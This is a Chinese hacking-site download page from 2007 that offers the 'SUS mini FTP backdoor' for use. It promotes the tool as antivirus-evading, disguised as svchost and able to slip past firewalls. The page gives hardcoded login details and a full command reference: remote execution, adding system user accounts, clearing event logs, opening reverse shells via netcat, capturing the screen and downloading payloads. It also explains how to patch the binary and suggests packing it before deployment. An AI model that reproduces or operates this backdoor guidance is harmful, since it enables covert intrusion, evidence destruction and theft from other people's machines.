通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码 电信网通铁通移动   在线
软件搜索:
热门搜索:QQ 加密解密 黑鹰远控 密码破解 代理公布
   首页 | 文章 | 软件 | 动画 | 资源 | 励志 | 骗术 | 论坛 | 邮箱 | 会员中心 | 军事 | 科技 | 博客 | 图片 | 商城 | 最近更新 | 800g资源 | 爱心红客
  软件首页  安全防护  扫描工具  密码破解  聊天工具  加密合并  安全检测  远程控制  Q Q 软件  嗅探监听  注册破解  综合利用  
 您现在的位置: 爱国者安全网 >> 黑客工具类 >> 远程控制 >> 软件信息
SUS迷你ftp后门
 软件大小: 93 K
 软件语言: 简体中文
 软件类型: 国产软件
 运行环境: Win9x/NT/2000/XP/2003
 添加时间: 2007-8-3 17:33:11
 软件评级: ★★★
 授权方式: 免费版
 开 发 商: 佚名
 软件添加:

水土不服

软件介绍:
这个后门的思路绝对新颖,将后门融入小巧的ftp服务器中.既能进行快速大量可靠的ftp传文件,又不失后门强大的控制功能.既保持苗条的身材,又具备良好的隐身术和超强的稳定性.本后门完全无需使用特定的客户端程序,任何时间,任何地点,想怎么控制,就怎么玩。再加上它原创免杀的特性.怎么样,跃跃欲试了吧?

这次发布的是测试版,压缩包内共一个文件wmiapsrv.exe。测试方法:将其解压到一个不含空格的目录里,如c:\windows\system32.运行即可。这样服务端便成功安装并运行了。

只需用任一款ftp连接工具(包括windows自带的ftp和IE),ip地址填服务端ip,端口填2100,用户名填sus,密码填sus666,确定后服务端的c:盘便立刻展现在眼前。

再看看其它的控制功能怎么实现的呢?
这里提供2种方法:

1.
telnet <服务端ip> 2100
输入user sus
pass sus666
待它显示Logged on后,便可以输入后门控制命令,如pslist。


2.
运行ftp.exe,然后输入open <服务端ip> 2100,按照提示输入用户名sus,密码sus666便登陆进去了。除了运行传统的ftp命令外,这里还可以用quote加上马上要提到的后门控制命令,如quote pslist。


专用的后门控制命令如下,这些在你输入help的时候显示出来。
######################################################################
Thank you for using the SUS's FTP BackDoor! Welcome to SUS!
Author: dklkt      Date: 2007.7
######################################################################

WINEXEC <exefilepath>          Using this to execute an executable file.
SHELLEXECUTE <exefilepath>      The same to above.
SETHOMEDIR <ftp's homedir>      Set the home directory of ftp's. Default is C:\
GETSYSINFO                      Get some system infomation
PSLIST                          List the Process on the system
PSKILL <PID>                    Kill a process by its pid
VIEWTERMPORT                    View Terminal Service's port. Default is 3389
SETTERMPORT <PortNum>          Set the Terminal Service's Port.
INSTALLTERM                    Install Terminal Service.
CLEANEVENT                      Clean the system event logs.
ENUMSERVICE                    List all the services in the system.
STARTSERVICE <ServcieName>      Start a service. Like "net start"
STOPSERVICE  <ServiceName>      Stop a service.
DELETESERVICE <ServiceName>    Delete a service.
VIEWSERVICE  <ServiceName>      View the detail of a service.
CONFIGSERVICE <ServiceName> <Type> Change service type(Auto,Demand,Disable)
REBOOT                          Reboot the system.
SHUTDOWN                        Power off the system.
STOPBACKDOOR                    Stop the Ftp Backdoor without uninstall it.
SENDBACKSHELL <ip> <port>      Send a back cmdshell. Use nc listen first
STARTSHELL <port>              Start a cmdshell and listen. You can telnet it.
CATCHSCREEN <bmpfilepath>      Catch the screen now and save it to a bmp file.
HTTPDOWNLOAD <filepath> <httpaddress>  Download a file using http protocol.
UNINSTALL                      Uninstall the Ftp Backdoor!
-------------------------------------------------
Good Luck! :-)

(本人英语比较搓,大家意会便可,语法问题多多 ^_^)

比如你在telnet模式下,想运行c:\mm.exe这个程序,便输入
winexec c:\mm.exe

在ftp模式下,想添加一个系统用户,可以输入
quote shellexecute net.exe user aaa /add

在telnet模式下,想修改ftp服务的home目录位置到d:盘,可以输入
sethomedir d:\

相应的的,ftp模式下,前面加上quote
quote sethomedir d:\


另外,虽然这是测试版,但特意没有加壳。你也可以根据需要手动修改用户名和密码。只需用UltraEdit等工具查找sus666等字符串修改即可。端口也是可以修改的,2100对应的16进制是834,因为是反序的,所以你查找34 08这两个字节就可以了,大约是在第a230那一行,改成相应的就行。比如想改成21,就把它改成15 00。希望大家自己用用就好,没必要对外传播。还有最好自己加个壳再拿去做后门。


差点忘了。把特性说明下:
本后门是替换系统服务自启动的,启动后伪装成svchost进程(相似程度100%)穿透防火墙。估计一般的辅助工具不容易查出来,这里你可以使用stopbackdoor命令停止后门,用uninstall命令卸载后门。
下载地址:
点击下载=>[山东电信]
点击下载=>[山东网通]
点击下载=>[浙江电信]
点击下载=>[河南网通]
点击下载=>[河南电信]
 相关软件:
FTP Now V2.6.81
迷你邮件发送器v1.0
绿环FTP数据备份 v1.2
冷风FTP服务器
迷你系统工具箱破解版
 注意事项:
* 为了达到最快的下载速度,推荐使用
* 如果您发现该软件不能下载,请联系本站编辑人员QQ458992,谢谢!
* 欢迎您在本站发布软件作品,详情请点这里
* 未经本站明确许可,任何网站不得非法盗链及抄袭本站资源!
下载排行
固顶软件[推荐]安全日志处理助手 1.7
普通软件系统OEM-DIY v1.2
普通软件Fs2You下载小帮手
普通软件黑防专用端口扫描器
普通软件Gh0st RAT Beta 2.4.3(2008/2/24 12
普通软件Aqua Deskperience
普通软件个人资料转移工具 V4.3
普通软件Expressor1.5.01变异免杀补丁
普通软件Dll_LoadEx Beta 1
固顶软件[推荐]Import REConstructor v1.7 F
普通软件系统工具批处理
普通软件大黑鱼火星文转换器 V2008.2
普通软件NetShareWatcher V1.4.3
普通软件GoolagScan 1.0.0.40
普通软件纪念版HACKER记事本
最近更新
固顶软件[推荐]安全日志处理助手 1.7
普通软件系统OEM-DIY v1.2
普通软件Fs2You下载小帮手
普通软件黑防专用端口扫描器
普通软件Gh0st RAT Beta 2.4.3(2008/2/24 12
普通软件Aqua Deskperience
普通软件个人资料转移工具 V4.3
普通软件Expressor1.5.01变异免杀补丁
普通软件Dll_LoadEx Beta 1
固顶软件[推荐]Import REConstructor v1.7 F
普通软件系统工具批处理
普通软件大黑鱼火星文转换器 V2008.2
普通软件NetShareWatcher V1.4.3
普通软件GoolagScan 1.0.0.40
普通软件纪念版HACKER记事本
最新推荐
固顶软件[推荐]安全日志处理助手 1.7
固顶软件[推荐]Import REConstructor v1.7 F
固顶软件[推荐]Windows 流氓软件清理大师 V6
固顶软件[推荐]Comodo Firewall Pro v3.0.16
固顶软件[推荐]FlashFXP V3.6 RC4(3.5.4 Bui
固顶软件[推荐]File Format Identifier v1.4
固顶软件[推荐]系统优化工具 v2.0
推荐软件[推荐]信鸽(unMSG) 2.1.080213 普及
固顶软件[推荐]DzSoft PHP Editor V4.1.2.2
固顶软件[推荐]FreShow[网页加密解密]
固顶软件[推荐]U盘巡警 v2.0 build 0203
固顶软件[推荐]黑鹰专业记事本(第五版)
固顶软件[推荐]虚拟硬盘大师 V4.65
固顶软件[推荐]Armadillo v5.20/5.40 Profes
固顶软件[推荐]DriveCrypt(世界顶级军用加密
固顶软件[推荐]PHPMaker V5.0.2